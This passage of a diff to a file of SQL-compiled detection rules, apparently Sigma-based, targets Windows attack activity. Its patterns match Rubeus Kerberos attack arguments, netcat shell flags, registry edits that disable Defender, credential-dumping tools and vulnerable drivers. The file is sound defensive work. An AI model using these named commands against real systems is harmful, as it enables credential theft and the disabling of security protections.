ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" ], - "filename": "posh_pm_susp_invocation_specific.yml" + "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", - "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", - "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "HackTool - CrackMapExec PowerShell Obfuscation", + "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", + "status": "test", + "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" }, { - "title": "Suspicious Get-ADDBAccount Usage", - "id": "b140afd9-474b-4072-958e-2ebb435abd68", - "status": "test", - "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Reg Add BitLocker", + "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "status": "experimental", + "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" ], - "filename": "posh_pm_get_addbaccount.yml" + "filename": "proc_creation_win_reg_bitlocker.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", - "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "title": "Add Potential Suspicious New Download Source To Winget", + "id": "c15a46a0-07d4-4c87-b4b6-89207835a83b", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects usage of winget to add new potentially suspicious download sources", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\') AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}')" ], - "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_winget_add_susp_custom_source.yml" }, { - "title": "Vulnerable Lenovo Driver Load", - "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", - "status": "experimental", - "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", + "title": "HackTool - Rubeus Execution", + "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", + "status": "stable", + "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Legitimate driver loads (old driver that didn't receive an update)" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '%asreproast %' ESCAPE '\\' OR CommandLine LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '%dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '%kerberoast %' ESCAPE '\\' OR CommandLine LIKE '%createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '%ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%/impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '%renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '%harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%hash /password:%' ESCAPE '\\' OR CommandLine LIKE '%golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '%silver /user:%' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_lenovo_driver.yml" + "filename": "proc_creation_win_hktl_rubeus.yml" }, { - "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", - "id": "295c9289-acee-4503-a571-8eacaef36b28", + "title": "PUA - Netcat Suspicious Execution", + "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", "status": "experimental", - "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.command_and_control", + "attack.t1095" ], "falsepositives": [ - "Unlikely" + "Legitimate ncat use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nc.exe' ESCAPE '\\' OR Image LIKE '%\\\\ncat.exe' ESCAPE '\\' OR Image LIKE '%\\\\netcat.exe' ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_hevd_driver.yml" + "filename": "proc_creation_win_pua_netcat.yml" }, { - "title": "PowerShell Scripts Run by a Services", - "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", + "title": "Potential Meterpreter/CobaltStrike Activity", + "id": "15619216-e993-4721-b590-4c520615a67d", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Unknown" + "Commandlines containing components like cmd accidentally", + "Jobs and services started with cmd" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" ], - "filename": "driver_load_win_powershell_script_installed_as_service.yml" + "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" }, { - "title": "WinDivert Driver Load", - "id": "679085d5-f427-4484-9f58-1dc30a7c426d", + "title": "Reg Disable Security Service", + "id": "5e95028c-5229-4214-afae-d653d573d0ec", "status": "experimental", - "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", + "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", "tags": [ - "attack.collection", "attack.defense_evasion", - "attack.t1599.001", - "attack.t1557.001" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate WinDivert driver usage" + "Unknown", + "Other security solution installers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" ], - "filename": "driver_load_win_windivert.yml" + "filename": "proc_creation_win_reg_disable_sec_services.yml" }, { - "title": "Vulnerable AVAST Anti Rootkit Driver Load", - "id": "7c676970-af4f-43c8-80af-ec9b49952852", - "status": "experimental", - "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Defender Download Activity", + "id": "46123129-1024-423e-9fae-43af4a0fa9a5", + "status": "test", + "description": "Detect the use of Windows Defender to download payloads", + "author": "Matthew Matchen", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" + "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" }, { - "title": "Vulnerable Dell BIOS Update Driver Load", - "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", + "title": "Suspicious Ping/Del Command Combination", + "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", "status": "experimental", - "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", + "author": "Ilya Krestinichev", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543", - "attack.t1068" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" ], - "filename": "driver_load_win_vuln_dell_driver.yml" + "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" }, { - "title": "Credential Dumping Tools Service Execution", - "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", - "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Sysinternals PsSuspend Suspicious Execution", + "id": "4beb6ae0-f85b-41e2-8f18-8668abc8af78", + "status": "experimental", + "description": "Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'pssuspend.exe' OR (Image LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR Image LIKE '%\\\\pssuspend64.exe' ESCAPE '\\')) AND CommandLine LIKE '%msmpeng.exe%' ESCAPE '\\')" ], - "filename": "driver_load_win_mal_creddumper.yml" + "filename": "proc_creation_win_sysinternals_pssuspend_susp_execution.yml" }, { - "title": "Vulnerable Driver Load", - "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "title": "Parent in Public Folder Suspicious Process", + "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", "status": "experimental", - "description": "Detects the load of known vulnerable drivers by hash value", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1068" - ], + "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA1=2261198385d62d2117f50f631652eded0ecc71db%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8db869c0674221a2d3280143cbb0807fac08e0cc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=27d3ebea7655a72e6e8b95053753a25db944ec0f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=33cdab3bbc8b3adce4067a1b042778607dce2acd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=21e6c104fe9731c874fab5c9560c929b2857b918%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d979353d04bf65cc92ad3412605bc81edbb75ec2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2f991435a6f58e25c103a657d24ed892b99690b8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f02af84393e9627ba808d4159841854a6601cf80%' 